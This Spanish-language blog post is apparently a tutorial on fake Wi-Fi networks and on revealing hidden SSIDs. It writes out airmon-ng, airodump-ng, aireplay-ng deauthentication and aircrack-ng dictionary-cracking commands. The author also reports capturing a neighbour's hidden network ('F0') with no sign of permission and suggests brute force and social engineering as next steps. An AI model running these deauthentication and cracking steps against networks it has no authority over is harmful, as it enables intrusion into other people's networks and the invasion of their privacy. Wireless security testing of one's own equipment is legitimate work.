Advertisement

header ads

La realidad de los ataques de redes fake y por que los ataques automáticos en redes no son buenos

Para acabar el año voy a publicar este post porque el otro día estaba pensando sobre las redes FAKE que había publicado y algunas herramientas que se habían publicado para hacer ataques automáticos.



Y como he hablado sobre algunas herramientas para evitar ataques, aquí te vengo a mostrar la realidad de redes FAKE.
 Y lo revise con wifite al mismo tiempo haciendo las 1000 redes fake

wifite -mac
Entonces no reconocía mis redes FAKE. De seguro el comando que use con mdk3 puede ser que sea ese problema pero te darás cuenta al analizar las redes FAKE con tu celular que las redes suben y bajan rápidamente pero sigamos pensando si la víctima logra ocultar su red.

Como observamos “FreddyMast” no esta a la vista entonces usaremos fluxion en el cual reconoce con algunos un buen resultado.
Recuerda no aparece mi SSID como lo vamos a obtener?
Con los siguientes comandos.
airmon-ng check kill
airmon-ng start wlan0
Recuerda según tu interfaz con ifconfig
airodump-ng wlan0mon
Pero podemos hacer un ataques con diccionario o capturar las redes para guardarla.
airodump-ng --bssid BSSID -c X -w creadpag wlan0mon
aireplay-ng --deauth 10 -a BSSID -c STATION wlan0mon
aircrack-ng --bssid BSSID -w /root/Desktop/wordlist.txt creadpag01
Ahora vamos a intentar con algunas herramientas más. Puedes usarlo con WPS penetrator
Pero no tuve ningún resultado porque mi router no tiene vulnerabilidad WPS y ni la SSID la reconoció.
Ahora obtengamos la SSID que no hemos logrado ni con fluxion ni con otras herramientas. Solo vamos a repetir los comandos anteriores. Recuerda la victima o tu victima tiene que al menos estar conectada para localizar todos los paquetes y encontrar la SSID.
Y justo haciendo este análisis me di cuenta que unos de mi vecino tiene oculta su red. mmmmm…. Interesante!




Hemos capturado a FreddyMast y F0 también estaba oculto y era Personal EAP.
Bueno ahora ya depende que ataques uses. Fuerza bruta y ingeniera social necesitas tener la SSID en el cual solo puedes obtenerlo haciéndolo manualmente.

¿Por qué hice eso?

El otro día había publicado de una herramienta de ataque de redes automatizada no voy a mencionar la herramienta por no estar autorizado y me propuse a enseñarle que mejor los ataques de redes sean controlados manualmente. Puede ser SSH o por alguna conexión del usuario. No estoy a favor de las herramientas automatizada pero tampoco estoy en contra de algún creador.
Te dejare unas palabras:
“Nunca envíes al ciego a cruzar la pista”
Mucha gracias, espero te guste y no te olvides en compartirlo con tus amigos. Recuerda que tienes un vídeo hablando sobre eso. Pincha aquí.

Publicar un comentario

0 Comentarios